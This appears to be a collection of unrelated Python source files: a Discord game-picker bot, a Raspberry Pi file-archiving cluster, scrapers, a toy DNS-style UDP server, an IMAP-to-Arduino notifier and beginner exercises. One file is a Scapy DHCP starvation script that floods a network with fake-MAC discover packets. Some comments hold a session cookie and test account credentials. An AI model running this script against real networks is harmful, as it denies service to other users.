'Brutal Strength', 'Corrupt Intervention', 'Coulrophobia',
'Dark Devotion', 'Deerstalker', 'Discordance', 'Distressing',
'Dying Light', 'Enduring', 'Fire Up', 'Franklin\'s Demise',
'Furtive Chase', 'Hangman\'s Trick', 'Hex: Devour Hope',
'Hex: Haunted Ground', 'Hex: Huntress Lullaby', 'Hex: No One Escapes Death',
'Hex: Ruin', 'Hex: The Third Seal', 'Hex: Thrill of the Hunt', 'I\'m All Ears',
'Infectious Fright', 'Insidious', 'Iron Grasp', 'Iron Maiden',
'Knock Out', 'Lightborn', 'Mad Grit', 'Make Your Choice', 'Monitor & Abuse',
'Monstrous Shrine', 'Overcharge', 'Overwhelming Presence',
'Play with Your Food', 'Pop Goes the Weasel', 'Predator', 'Rancor',
'Remember Me', 'Save the Best for Last', 'Shadowborn', 'Sloppy Butcher',
'Spies from the Shadows', 'Spirit Fury', 'Stridor', 'Surveillance',
'Territorial Imperative', 'Tinkerer', 'Thanatophobia', 'Thrilling Tremors',
'Unnerving Presence', 'Unrelenting', 'Whispers']
tosser = Tosser(KPerks)
result = tosser.toss(count, True)
if type(result) is list:
title = '🔣 Killer Perks'
embed = make_embed(title, result)
await ctx.message.channel.send(embed=embed)
else:
await ctx.message.channel.send("Error parsing killer perks.")
@commands.command(pass_context=True)
async def defender(self, ctx, count=1):
"""Pick a Rainbow Six DEFENDER"""
class Defender:
SIDES = ["Alibi", "Bandit", "Castle", "Caveira", "Clash", "Doc", "Echo", "Ela", "Frost", "Jäger", "Kaid",
"Kapkan", "Lesion", "Maestro", "Mira", "Mozzie", "Mute", "Pulse", "Recruit", "Rook", "Smoke",
"Tachanka", "Valkyrie", "Vigil", "Warden"]
tosser = Tosser(Defender)
result = tosser.toss(count, True)
if type(result) is list:
title = '🛡️ Defenders'
embed = make_embed(title, result)
await ctx.message.channel.send(embed=embed)
else:
await ctx.message.channel.send("Error parsing defender.")
@commands.command(pass_context=True)
async def attacker(self, ctx, count=1):
"""Pick a Rainbow Six ATTACKER"""
class Attacker:
SIDES = ["Ash", "Blackbeard", "Blitz", "Buck", "Capitão", "Dokkaebi", "Finka", "Fuze", "Glaz", "Gridlock",
"Hibana", "IQ", "Jackal", "Lion", "Maverick", "Montagne", "Nomad", "Nøkk", "Recruit", "Sledge",
"Thatcher", "Thermite", "Twitch", "Ying", "Zofia"]
tosser = Tosser(Attacker)
result = tosser.toss(count, True)
if type(result) is list:
title = '🔫 Attackers'
embed = make_embed(title, result)
await ctx.message.channel.send(embed=embed)
else:
await ctx.message.channel.send("Error parsing attacker.")
@commands.command(pass_context=True)
async def toss(self, ctx, items, count=1, unique='t'):
"""Pick an amount from a list"""
words = items.split(',')
user_list = lambda: None
setattr(user_list, 'SIDES', words)
tosser = Tosser(user_list)
result = tosser.toss(count, bool(unique == 't'))
if type(result) is list:
title = '⁉ Lists!'
embed = make_embed(title, result)
await ctx.message.channel.send(embed=embed)
else:
await ctx.message.channel.send("Error parsing list.")
def setup(bot):
bot.add_cog(Games(bot))
|
from .database import *
class Model:
"""
Modellen: Klassen innehåller datastrukturen.
-- Kontrollern kan skicka meddelanden till Modellen
och Modellen kan besvara dem.
-- Modellen använder delegater för att sända meddelanden
till Kontrollern vid förändring.
-- Modellen kommunicerar ALDRIG med Vyn.
-- Modellen har getters och setters för att kommunicera
med Kontrollern.
"""
def __init__(self, vc):
self.vc = vc
self.db = Database()
def data_changed_delegate(self):
self.vc.data_changed_delegate()
def set_new_user(self, customer, address, country):
self.db.set_new_user(customer, address, country)
self.data_changed_delegate()
|
import os, sys
import subprocess
import fileinput
import time
import sendFile
#sysfs = os.statvfs("/media/pi/")
listNodes = []
maxNodes = 3
fileSequence = 1
totalDataSent = 0
filesDiretory = "/"
def getNewNode():
assert(len(listNodes) < maxNodes)
nextIP = "192.168.0." + str(2+len(listNodes))
nextNode = "ping -W 1 -c 1 " + nextIP
call = subprocess.Popen(nextNode.split(),stdout=subprocess.PIPE)
returnValue = call.communicate()[0].decode()
while ("1 received" not in returnValue):
print("Node",len(listNodes)+1,"is unavailable. Plug it in now. Retrying in 5 seconds.")
call = subprocess.Popen(nextNode.split(),stdout=subprocess.PIPE)
time.sleep(5)
returnValue = call.communicate()[0].decode()
print("Found new node:",nextIP)
newNode = {"ip":nextIP, "Active":True}
#nodeCapacity = 100000000000
nodeCapacity = setupNewNode(nextIP)
newNode["capacity"] = nodeCapacity
listNodes.append(newNode)
def setupNewNode(ip):
nextNode = "./setupOneNode.sh " + ip
call = subprocess.Popen(nextNode.split(),stdout=subprocess.PIPE)
rv = call.communicate()[0].decode()
rv = rv[rv.find("startcapacity")+13:rv.find("endcapacity")]
nextNode = "./runRemote.sh " + ip
call = subprocess.Popen(nextNode.split(),stdout=subprocess.PIPE)
x = call.communicate()[0].decode()
#print(x)
time.sleep(3)
#print("rv", rv)
#rv = 1000000000
return int(rv)
def getFiles(location):
call = subprocess.Popen(["ls","-l",location],stdout=subprocess.PIPE)
rv = call.communicate()[0].decode().split("\n")
firstList = [f.split() for f in rv]
returnList = []
for each in firstList:
if len(each) > 2 and len(each) < 10:
n = each[8]
if len(each) > 9:
for s in each[9:]:
n+=" "+s
if each[0][0] == "-" and int(each[4]) > 0:
returnList.append({"size": int(each[4]),"location": location,"name": n.replace("\'","")})
elif each[0][0] == "d":
returnList += getFiles(location+n.replace("\'","")+"/")
return returnList
def storeFiles(files):
global fileSequence
global maxNodes
global totalDataSent
global filesDiretory
receiveLogFile = open("receive_log_master","a")
receiveLogFile.write("Storing_file\tStoring_file_size\tStoring_file_index\tStoring_into_node\tFile_transfer_time\tBytes_per_second\tTotal_time_taken\tTotal_data_archived\tNode_capacity\n")
index = 0
startTime = time.time()
while len(files) > 0 and index < maxNodes:
if index == len(listNodes):
print("Out of capacity. Need to add more nodes.")
getNewNode()
time.sleep(2)
elif files[0]["size"]+10000000 < listNodes[index]["capacity"]:
receiveLogFile.write(files[0]["name"]+"\t")
receiveLogFile.write(str(files[0]["size"])+"\t")
receiveLogFile.write(str(fileSequence)+"\t")
receiveLogFile.write(str(index+1)+"\t")
aFile = files.pop(0)
aFile["node"] = listNodes[index]["ip"]
h, newCap, tToken = sendFile.sendOneFile(listNodes[index]["ip"], aFile["location"], aFile["name"],str(fileSequence),False)
print("newCap ",newCap)
aFile["hash"] = h
#newCap = 0
listNodes[index]["capacity"] = int(newCap)
fileSequence += 1
totalDataSent += aFile["size"]
receiveLogFile.write(str(tToken)+"\t")
stringToWrite = str(aFile["size"]/tToken) if tToken > 0 else "0"
receiveLogFile.write(stringToWrite+"\t")
receiveLogFile.write(str(time.time()-startTime)+"\t")
receiveLogFile.write(str(totalDataSent)+"\t")
receiveLogFile.write(str(newCap)+"\n")
elif listNodes[index]["capacity"] == -1:
print("Rebooting node",index)
h, newCap, tToken = sendFile.sendOneFile(listNodes[index]["ip"], "end", "end","end",True)
time.sleep(5)
nextNode = "./restart.sh " + listNodes[index]["ip"]
call = subprocess.Popen(nextNode.split(),stdout=subprocess.PIPE)
call.communicate()
listNodes.pop(index)
time.sleep(30)
getNewNode()
time.sleep(30)
else:
h, newCap, tToken = sendFile.sendOneFile(listNodes[index]["ip"], "end", "end","end",True)
index += 1
if len(files) == 0:
files = getFiles(filesDiretory)
receiveLogFile.write("Done_Archiving_Data\n\n")
def resetCluster():
ipValue = 2
while (ipValue <= 4):
nextIP = "192.168.0." + str(ipValue)
nextNode = "ping -W 1 -c 1 " + nextIP
call = subprocess.Popen(nextNode.split(),stdout=subprocess.PIPE)
returnValue = call.communicate()[0].decode()
while ("1 received" not in returnValue):
print("Node",ipValue-1,"is unavailable. Plug it in now. Retrying in 5 seconds.")
call = subprocess.Popen(nextNode.split(),stdout=subprocess.PIPE)
time.sleep(5)
returnValue = call.communicate()[0].decode()
nextNode = "./reset.sh " + nextIP
call = subprocess.Popen(nextNode.split(),stdout=subprocess.PIPE)
call.communicate()
ipValue += 1
def verifyCluster():
verifyLogFile = open("verify_log_master","a")
ipValue = 2
startTime = time.time()
verifyLogFile.write("Starting_verifyCluster "+str(startTime)+"\n")
while (ipValue <= 4):
nextIP = "192.168.0." + str(ipValue)
nextNode = "ping -W 1 -c 1 " + nextIP
call = subprocess.Popen(nextNode.split(),stdout=subprocess.PIPE)
returnValue = call.communicate()[0].decode()
while ("1 received" not in returnValue):
print("Node",ipValue-1,"is unavailable. Plug it in now. Retrying in 5 seconds.")
call = subprocess.Popen(nextNode.split(),stdout=subprocess.PIPE)
time.sleep(5)
returnValue = call.communicate()[0].decode()
nextNode = "./verify.sh " + nextIP
call = subprocess.Popen(nextNode.split(),stdout=subprocess.PIPE)
call.communicate()
ipValue += 1
verifyLogFile.close()
def main():
global filesDiretory
while True:
i = input("Type new command:\nQuit: q\nVerify files: v\nShutdown nodes: s\nArchive files: a\nReset nodes: r\nUpload files: u\n")
if i.strip() == "q" or i.strip() == "Q":
exit()
elif i.strip() == "r" or i.strip() == "R":
resetCluster()
elif i.strip() == "s" or i.strip() == "S":
os.system("./shutdown.sh")
elif i.strip() == "a" or i.strip() == "A":
x = input("Directory with files to archive is /media/james/Sandisk/. Type full path to change or press enter to use default.")
if x == "":
originDirectory = "/media/james/Sandisk/"
else:
originDirectory = x
filesDiretory = originDirectory
fileList = getFiles(originDirectory)
storeFiles(fileList)
elif i.strip() == "v" or i.strip() == "V":
verifyCluster()
elif i.strip() == "u" or i.strip() == "U":
os.system("./uploadFiles.sh")
main() |
x=1
end=False
names=[]
while x<=10:
n=input("Enter Name #"+str(x)+": ")
names.append(n)
x=x+1
while end == False:
search=input("\nSearch for a name (type 'e' to stop")
if search in names:
print(search," was found")
else:
if search="e":
end=True
else:
print (search," was not found")
|
# -*- coding: utf-8 -*-
{
'name': 'variacion tipo de cambio',
'version': '1.0.0',
'category': '',
'description': """
In some organisations people want an extra state between draft - send and confirmed.
This module adds state validated to sale order and puts also a menu extra in the sales
""",
'author': 'Econube | Pablo Cabezas Jose Pinto',
'website': 'http://www.econube.cl',
'depends': ['account_voucher'],
'init': [],
'data': ['wizard/wizard_cambio.xml','form_account.xml','res_config.xml'],
'demo': [],
'test': [],
'installable': True,
'active': False,
}
|
from django.conf import settings as django_settings
from django.utils.translation import ugettext_lazy as _
from feincms.admin.tree_editor import *
class TreeEditor(TreeEditor):
def _actions_column(self, instance):
actions = super(TreeEditor, self)._actions_column(instance)
static_url = django_settings.STATIC_URL
opts = instance._meta
if hasattr(opts, 'parent_attr'):
actions.insert(0, u'<a href="add/?%s=%s" title="%s"><img src="%simg/admin/icon_addlink.gif" alt="%s"></a>' % (
opts.parent_attr, instance.pk, _('Add child'), static_url, _('Add child')))
actions.insert(0, u'<a href="%s" title="%s"><img src="%simg/admin/selector-search.gif" alt="%s" /></a>' % (
instance.get_absolute_url(), _('View on site'), static_url, _('View on site')))
return actions
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.7 on 2017-08-18 10:27
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('nova', '0010_apphost_name'),
]
operations = [
migrations.AddField(
model_name='app',
name='port',
field=models.IntegerField(default=3300, verbose_name='\u5e94\u7528\u7aef\u53e3\u53f7'),
preserve_default=False,
),
migrations.AddField(
model_name='apphost',
name='port',
field=models.IntegerField(default=3300, verbose_name='\u5e94\u7528\u7aef\u53e3\u53f7'),
preserve_default=False,
),
]
|
import requests
ua = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) ' \
'AppleWebKit/537.36 (KHTML, like Gecko) ' \
'Chrome/75.0.3770.142 Safari/537.36'
headers = {
'User-Agent': ua
#'Accept': text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
#'Accept-Encoding': gzip, deflate, br
#'Accept-Language': zh-CN,zh;q=0.9,en;q=0.8
#'Cache-Control': max-age=0
#'Connection': 'keep-alive'
#'Cookie': fvlid=15673392426551GLwzfGdFQ; sessionid=77FF0F2E-D9B8-4C3D-B6D6-2FC036E040E8%7C%7C2019-09-01+20%3A00%3A44.661%7C%7Cwww.baidu.com; autoid=a2a43099f0b250aa04ca9b5ccd21debe; area=610113; ahpau=1; __ah_uuid_ng=c_77FF0F2E-D9B8-4C3D-B6D6-2FC036E040E8; sessionuid=77FF0F2E-D9B8-4C3D-B6D6-2FC036E040E8%7C%7C2019-09-01+20%3A00%3A44.661%7C%7Cwww.baidu.com; sessionip=111.20.192.214; sessionvid=551BC7D1-7B58-4C4E-B0D0-BFDF2F2FD210; pvidchain=102410,102410; ahpvno=17; ref=www.baidu.com%7C0%7C0%7C0%7C2019-09-02+14%3A08%3A57.853%7C2019-09-01+20%3A00%3A44.661
#'Host'=club.autohome.com.cn
#'Upgrade':''-Insecure-Requests: 1
}
r=requests.get('https://club.autohome.com.cn/bbs/thread/0682da758120fbb8/82601920-1.html',headers=headers).text
print(r) |
from socket import *
import sys
server_port = 53533
# Create a socket (UDP)
server_socket = socket(AF_INET, SOCK_DGRAM)
# Bind to port
server_socket.bind(('', server_port))
DataDict = {}
# Now listen
print('The server is ready to receive message...')
while True:
# Receive message
message, client_address = server_socket.recvfrom(2048)
data = message.decode()
if 'VALUE' and 'TTL' in data:
#For Data Dictionary
Type, Name, Value, TTL = data.split('\n')
TypeDNS = Type.strip().split('=')[-1]
TTLValue = TTL.strip().split('=')[-1]
Hostname = Name.strip().split('=')[-1]
IP = Value.strip().split('=')[-1]
DataDict["Type"] = TypeDNS
DataDict["Hostname"] = Hostname
DataDict["IP"] = IP
DataDict["TTL"] = TTLValue
#for File
file = open('Data.txt','w')
file.write(data)
file.close()
modified_message = '201'
# Send it back
server_socket.sendto(modified_message.encode(), client_address)
else:
Type, Name = data.split('\n')
Hostname = Name.strip().split('=')[-1]
TypeDNS = Type.strip().split('=')[-1]
file = open('Data.txt', 'r')
FileData = file.read()
TypeFile, NameFile, ValueFile, TTLFile = FileData.split('\n')
'''TypeDNSFile = TypeFile.strip().split('=')[-1]
TTLValueFile = TTLFile.strip().split('=')[-1]
HostnameFile = NameFile.strip().split('=')[-1]
IPFile = ValueFile.strip().split('=')[-1]'''
if 'A' in TypeFile and Hostname in NameFile :
modified_message = str(FileData)
server_socket.sendto(modified_message.encode(), client_address)
|
from scapy.all import *
import sys, getopt
import netifaces
def main(argv):
ifaceList = netifaces.interfaces()
try:
opts, args = getopt.getopt(argv,"hi:",["iface="])
except getopt.GetoptError:
print "StarvationDHCP.py -i <interface>"
print "Interfaces availables: " + str(ifaceList)
sys.exit(2)
for opt, arg in opts:
if opt == "-h":
print " --> StarvationDHCP.py [-i | --iface] <interface> // default 'eth0'"
print " --> Interfaces availables: " + str(ifaceList)
sys.exit()
elif opt in ("-i", "--iface"):
if str(argv[1]) in ifaceList:
conf.iface = argv[1]
else:
print "Invalid interface. Interfaces availables: " + str(ifaceList)
exit()
else:
conf.iface = 'eth0' #Interface default eth0
conf.checkIPaddr = False
print "Interface: " + conf.iface
print """
*** ***
*** Push Ctrl+C to stop after several seconds ***
*** ***
"""
for x in range(255): # send 255 packet with fakes macs
src_mac = str(RandMAC())
ether = Ether(dst='ff:ff:ff:ff:ff:ff',src=src_mac)
ip = IP(src="0.0.0.0", dst="255.255.255.255")
udp = UDP(sport=68, dport=67)
bootp = BOOTP(chaddr=src_mac, ciaddr='0.0.0.0', flags=1)
dhcp = DHCP(options=[("message-type", "discover"), "end"])
packet = ether/ip/udp/bootp/dhcp # create packet
packet.show() #show info to generated packet
#sendp(packet,loop=1) # send a packet countless times
sendp(packet)
if __name__ == "__main__":
main(sys.argv[1:])
|
from .eLABJournalObject import *
from .Samples import *
import urllib.parse
class Storage(eLABJournalObject):
def __init__(self, api, data):
"""
Internal use only: initialize storage object
"""
if ((data is not None) & (type(data) == dict) &
("name" in data)
):
super().__init__(api, data, "storageID", str(data["name"]))
else:
raise Exception("no (valid) Storage data")
def visualize(self):
"""
Create visualization.
"""
g = super().visualize()
storage_type = self.storage_type()
if storage_type:
storage_type_id = str(storage_type.id())
storage_type_name = str(storage_type.name())
storage_type_type = str(storage_type.type())
with g.subgraph(name="cluster_type") as g_type:
g_type.attr(tooltip="type of storage", label="storageTypeID "+storage_type_id, style="filled", color="black", fillcolor="#EEEEEE")
g_type.node("storage_type_name",storage_type_name, {"tooltip": "type of storage", "style": "filled", "fillcolor": "white", "shape": "rect"})
g_type.node("storage_type_type",storage_type_type, {"tooltip": "type of storage", "style": "filled", "fillcolor": "white", "shape": "rect"})
g.edge("storage_type_type", "class_name", None, {"constraint": "false"})
return(g)
def barcode(self):
"""
Get the barcode of the storage (layer).
"""
if "barcode" in self.data():
barcode = self.data()["barcode"]
return(barcode)
return None
def storage_layer(self):
"""
Get the storage layer.
"""
if "storageLayerID" in self.data():
storageLayerID = self.data()["storageLayerID"]
if storageLayerID>0:
return(self._eLABJournalObject__api.storage_layer(storageLayerID))
return None
def storage_type(self):
"""
Get the storage type.
"""
if "storageType" in self.data():
storageType = self.data()["storageType"]
if isinstance(storageType, dict) & ("storageTypeID" in storageType.keys()):
storageTypeID = storageType["storageTypeID"]
return(self._eLABJournalObject__api.storage_type(storageTypeID))
return None
def statistics(self):
"""
Get statistics for storage.
"""
request = {}
rp = self._eLABJournalObject__api._request("/api/v1/storage/"+urllib.parse.quote(str(self.id()))+"/statistics", "get", request)
#check and get
if (rp is not None) & (type(rp) == dict):
return(rp)
else:
return(None)
def samples(self, *args, **kwargs):
"""
Get object to access samples for storage.
Parameters (object)
----------------------
class: parser
Pass the result of the first() method on this object instead
class: sample_type
Filter by sampleTypeID of this object
Parameters (key/value)
----------------------
expand : str, optional
Expand an ID field to an object
separate values with comma for multiple expands
location, quantity, meta, experiments
sort : str, optional
Sort by a specific field
checkedOut : str, optional
Filter for checked out samples
minimumQuantityAmount : str, optional
Filter for samples that have a minimum quantity amount set
name : str, optional
Filter by sample name
sampleTypeID : str, optional
Filter by sampleTypeID
barcodes : str, optional
Filter by barcodes (comma-separated)
search : str, optional
Search term to use for filtering samples.
quantityID : str, optional
Filter by quantityID
"""
request = {}
kwargs_special = ["expand", "sort"]
kwargs_keys = ["checkedOut", "name", "sampleTypeID", "barcodes",
"search", "quantityID"]
if args is not None:
for arg in args:
check_arg = arg
if isinstance(check_arg,eLABJournalPager):
check_arg = arg.first(True)
if isinstance(check_arg,SampleType):
request["sampleTypeID"] = check_arg.id()
else:
raise Exception("unsupported object '"+str(type(check_arg))+"'")
if kwargs is not None:
for key, value in kwargs.items():
if key in kwargs_special:
request["$"+key] = value
elif key in kwargs_keys:
request[key] = value
else:
raise Exception("unsupported key '"+key+"'")
return(Samples(self._eLABJournalObject__api, "Samples", "/api/v1/storage/"+urllib.parse.quote(str(self.id()))+"/samples", request, "sampleID", 5, self._eLABJournalObject__api.sample))
|
"""
test fixtures package
"""
|
import time
import imaplib
import serial
##ORG_EMAIL = "@gmail.com"
##FROM_EMAIL = "test50201" + ORG_EMAIL
##FROM_PWD = "TestTest123!"
##SMTP_SERVER = "imap.gmail.com"
##SMTP_PORT = 993
def getUsername():
return input("Username: ")
def getPassword():
return input("Password: ")
def readMail():
mail = imaplib.IMAP4_SSL(SMTP_SERVER)
mail.login(FROM_EMAIL, FROM_PWD)
latest_email_id = ''
while True:
mail.select('inbox')
typ, data = mail.search(None, 'ALL')
mail_ids = data[0]
id_list = mail_ids.split()
if(mail_ids[-1] == latest_email_id):
print("No New Email")
time.sleep(3)
else:
print("A new email has arrived!")
sendSignal()
latest_email_id = mail_ids[-1]
time.sleep(3)
def sendSignal():
arduino.write(b'1')
ORG_EMAIL = "@gmail.com"
USERNAME = getUsername()
FROM_EMAIL = USERNAME + ORG_EMAIL
PASSWORD = getPassword()
FROM_PWD = PASSWORD
SMTP_SERVER = "imap.gmail.com"
SMTP_PORT = 993
arduino = serial.Serial('COM3', 9600)
readMail()
|
# My solution for https://www.hackerrank.com/challenges/predicting-house-prices/problem
# this program gets a score of (9.82 / 10)
import numpy as np
def parseInput():
# put the number of features in the 'feature' variable
# put the number of training examples in the 'number' variable
features, number = list(map(int,input().split()))
# trainData : list of list containing all the training exapmples features
# trainLabels : prices for the training examples in the same sequence as train_data
trainData = []
trainLabels = []
for i in range(number):
trainData.append(list(map(float,input().split())))
for i in trainData:
trainLabels.append(i[-1])
i.pop()
# testNumber : Number of test set examples
# testData : list of list containing the test examples
testNumber = int(input())
testData = []
for i in range(testNumber):
testData.append(list(map(float,input().split())))
return (trainData, trainLabels, testData)
def changeToMatrix(trainData, trainLabels, testData):
trainDataMatrix = np.array(trainData)
trainLabelsMatrix = np.array(trainLabels)
trainDataMatrixTranspose = np.transpose(trainDataMatrix)
xtransposexX = np.matmul(trainDataMatrixTranspose, trainDataMatrix)
xtransposexXInverse = np.linalg.pinv(xtransposexX)
xtransposexXInverseintoX = np.matmul(
xtransposexXInverse, trainDataMatrixTranspose)
thetaMatrix = np.matmul(xtransposexXInverseintoX, trainLabelsMatrix)
return thetaMatrix
trainData, trainLabels, testData = parseInput()
thetaMatrix = changeToMatrix(trainData, trainLabels, testData)
for j in testData:
print (np.matmul(np.transpose(thetaMatrix), np.array(j)))
|
#!/usr/bin/python
#\file loadcell1.py
#\brief Serial communication test with Arduino where loadcells are installed.
#\author Akihiko Yamaguchi, info@akihikoy.net
#\version 0.1
#\date Apr.13, 2021
import sys
import serial
import time
if __name__=='__main__':
dev= sys.argv[1] if len(sys.argv)>1 else '/dev/ttyACM0'
baudrate= int(sys.argv[2]) if len(sys.argv)>2 else 2e6
ser= serial.Serial(dev,baudrate,serial.SEVENBITS,serial.PARITY_NONE)
count= 0
t_prev= time.time()
try:
while True:
raw= ser.readline()
try:
value= float(raw.replace('Reading:','').replace('g\r\n','').strip())
except ValueError:
print 'No regular value: {raw} ({l})'.format(raw=repr(raw), l=len(raw))
continue
print '{raw} ({l}), {value}'.format(raw=repr(raw), l=len(raw), value=value)
#if len(raw)!=17: continue
#value= float(raw[3:12])
count+= 1
if count%40==0:
print 'FPS:',40./(time.time()-t_prev)
t_prev= time.time()
#ser.reset_input_buffer()
##ser.flushInput()
#raw= ser.readline()
#time.sleep(0.01)
finally:
ser.close()
|
if __name__ == "__main__":
favorite_fruits = [
'apple',
'banana',
'peach',
'cherry',
'tomato'
]
if 'banana' in favorite_fruits:
print("You are right bananas are great!")
if 'cherry' not in favorite_fruits:
print("What is wrong with cherry's?")
if 'tomato' in favorite_fruits:
print("Tomatos are juicy!")
if 'peach' in favorite_fruits and 'apple' in favorite_fruits:
print("Peaches and apples are great!")
if 'bread' in favorite_fruits:
print("Bread is not a fruit!") |
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
import numpy as np
df = pd.DataFrame({'DataSet':['10', '10','20','20', '30', '30', '40', '40', '50', '50'],\
'Proposed':[0.1, 4, 0, 4.8, 0, 6, 0, 7.3, 0, 8],
'VI-ORB SLAM':[0, 3, 0, 5.1, 0, 6.2, 0, 7.6, 0, 8.1]})
df = df[['DataSet','Proposed','VI-ORB SLAM']]
print(df)
dd=pd.melt(df,id_vars=['DataSet'],value_vars=['Proposed','VI-ORB SLAM'],var_name='Algorithm')
fig = sns.boxplot(x='DataSet',y='value',data=dd,hue='Algorithm', width=0.4)
fig.legend(loc='upper center', bbox_to_anchor=(0.5, 1.18),
ncol=2, fancybox=True, shadow=True)
fig.set(xlabel='Distance Travelled (m)', ylabel='Error (m)')
figure_title = "Laptop"
plt.text(0.5, 1.22, figure_title,
horizontalalignment='center',
fontsize=18,
transform = fig.transAxes)
#plt.grid(True)
plt.show()
|
#! python3
import webbrowser
import sys
import bs4
import requests
import openpyxl
import os
import xlsxwriter
import re
rootSite = 'http://wiki.wargaming.net/en/World_of_Warships'
#shipclasses = ['DD', 'CA', 'BB', 'CV']
shipclasses = ['DD', 'CA', 'BB']
# shipclasses = ['CA', 'BB']
# skiplist = ['St. Louis']
for shipclass in shipclasses:
if shipclass == 'DD':
shipsite = 'http://wiki.wargaming.net/en/Ship:Destroyers'
elif shipclass == 'CA':
shipsite = 'http://wiki.wargaming.net/en/Ship:Cruisers'
elif shipclass == 'BB':
shipsite = 'http://wiki.wargaming.net/en/Ship:Battleships'
elif shipclass == 'CV':
shipsite = 'http://wiki.wargaming.net/en/Ship:Aircraft_Carriers'
##### creating the resultfile
shipfilename = shipclass+'results.xlsx'
relpath = os.path.abspath(os.path.dirname(__file__))
resultfile = relpath+"\\"+shipfilename
if os.path.exists(resultfile):
os.remove(resultfile)
print('deleted '+resultfile)
print('creating file with xlswriter')
xlswritership = xlsxwriter.Workbook(shipfilename)
xlswritership.close()
shipsheet = openpyxl.load_workbook(shipfilename)
firstsheet = shipsheet['Sheet1']
firstsheet.title = 'BattleLevel 1'
shipsheet.create_sheet('BattleLevel 2')
shipsheet.create_sheet('BattleLevel 3')
shipsheet.create_sheet('BattleLevel 4')
shipsheet.create_sheet('BattleLevel 5')
shipsheet.create_sheet('BattleLevel 6')
shipsheet.create_sheet('BattleLevel 7')
shipsheet.create_sheet('BattleLevel 8')
shipsheet.create_sheet('BattleLevel 9')
shipsheet.create_sheet('BattleLevel 10')
#resultfile created
##### setting the top row of each sheet
toprow = [
'shipName',
'shipClass',
'shipCountry',
'shipTier',
'shipCurrency',
'shipCost',
'shipHitPoints',
'shipResearch',
'shipMainGun',
'shipMainGunCount',
'shipMainGunROF',
'shipMainGunReload',
'shipMainGunRotate',
'shipMainGun180',
'shipMainGunRange',
'shipMainGunDispersion',
'shipMainGunHEShell',
'shipMainGunHEDam',
'shipMainGunHEFire',
'shipMainGunHEVel',
'shipMainGunHEWeight',
'shipMainGunAPShell',
'shipMainGunAPDam',
'shipMainGunAPVel',
'shipMainGunAPWeight'
]
for sheet in shipsheet.worksheets:
# print(toprow)
for n in range(1,len(toprow)+1):
sheet.cell(row=1,column=n).value = toprow[n-1]
#testing the root site
# rootres = requests.get(rootsite)
# rootres.raise_for_status()
# rootSoup = bs4.BeautifulSoup(rootres.text)
##TODO - turn this into something that isn't restricted to DD
#get destroyer site
pagereq = requests.get(shipsite)
pagereq.raise_for_status()
pagesoup = bs4.BeautifulSoup(pagereq.text, "html.parser")
#print japanese DD names
nationDivs = pagesoup.find_all("div",class_="wot-frame-1")
for nation in nationDivs:
print('====================')
print(nation.find("h2").text)
print('====================')
nationShips = nation.find_all("div",class_="tleft")
for thisShip in nationShips:
fulllink = 'http://wiki.wargaming.net'+(thisShip.find_all("a"))[1].attrs['href']
getshipname = (thisShip.find_all("a"))[1].text
print('regex time')
if (re.search("St.*Louis",getshipname)) or (re.search("Nueve.de.Julio",getshipname)):
print('found it')
else:
shiparray = {}
shiparray['shipName'] = getshipname
print('----- ' + shiparray['shipName'])
# print(fulllink)
thisShipPage = requests.get(fulllink)
thisShipPage.raise_for_status()
thisShipSoup = bs4.BeautifulSoup(thisShipPage.text, "html.parser")
#gets class, country, tier
perfdiv = thisShipSoup.find('div',class_='b-performance_position')
shiparray['shipClass'] = perfdiv.text.split(' | ')[0]
shiparray['shipCountry'] = perfdiv.text.split(' | ')[1]
shiparray['shipTier'] = perfdiv.text.split(' | ')[2]
# print(shiparray)
#gets general, armament, toobs, maneuverability, concealment
shipstats = thisShipSoup.find('div',class_='b-performance_border').find_all('div',class_='gw-popup-card b-tech-nav_item__opened')
for statgroup in shipstats:
groupName = statgroup.find('div',class_='b-performance_title gw-popup-card_head js-tech-nav_head').text
# print('--')
# print(groupName)
# print('--')
stats = statgroup.find('div',class_='gw-popup-card_content').find_all('tr')
###GENERAL STAT GROUP
if groupName == 'General':
# shipCurrency = ''
# shipCost = ''
# shipHitPoints = ''
# shipResearch = ''
for stat in stats:
# print('--------------')
##TODO - strip whitespace from variables
if stat.find('span',class_='t-performance_left').text == 'Purchase price':
shiparray['shipCurrency'] = stat.find('img')['alt']
shiparray['shipCost'] = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Hit Points':
shiparray['shipHitPoints'] = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Research price':
shiparray['shipResearch'] = stat.find('span',class_='t-performance_right').text
# if shipCost != 'promo':
# print('Currency: '+shipCurrency)
# print('Cost: '+shipCost)
# print('HP: '+shipHitPoints)
# if shipResearch != '':
# print('ResearchXP: '+shipResearch)
#print(stats)
###MAIN BATTERY
elif groupName == 'Main Battery':
# shipMainGun = ''
# shipMainGunCount = ''
# shipMainGunROF = ''
# shipMainGunReload = ''
# shipMainGunRotate = ''
# shipMainGun180 = ''
# shipMainGunRange = ''
# shipMainGunDispersion = ''
# shipMainGunHEShell = ''
# shipMainGunHEDam = ''
# shipMainGunHEFire = ''
# shipMainGunHEVel = ''
# shipMainGunHEWeight = ''
# shipMainGunAPShell = ''
# shipMainGunAPDam = ''
# shipMainGunAPVel = ''
# shipMainGunAPWeight = ''
shiparray['shipMainGun'] = stats[0].find('span',class_='t-performance_left').text
shiparray['shipMainGunCount'] = stats[0].find('span',class_='t-performance_right').text
for stat in stats:
if stat.find('span',class_='t-performance_left').text == 'Rate of Fire':
shiparray['shipMainGunROF'] = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Reload Time':
shiparray['shipMainGunReload'] = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Rotation Speed':
shiparray['shipMainGunRotate'] = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == '180 Degree Turn Time':
shiparray['shipMainGun180'] = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Firing Range':
shiparray['shipMainGunRange'] = stat.find('span',class_='t-performance_right').text
if stat.find('span',class_='t-performance_left').text == 'Maximum Dispersion':
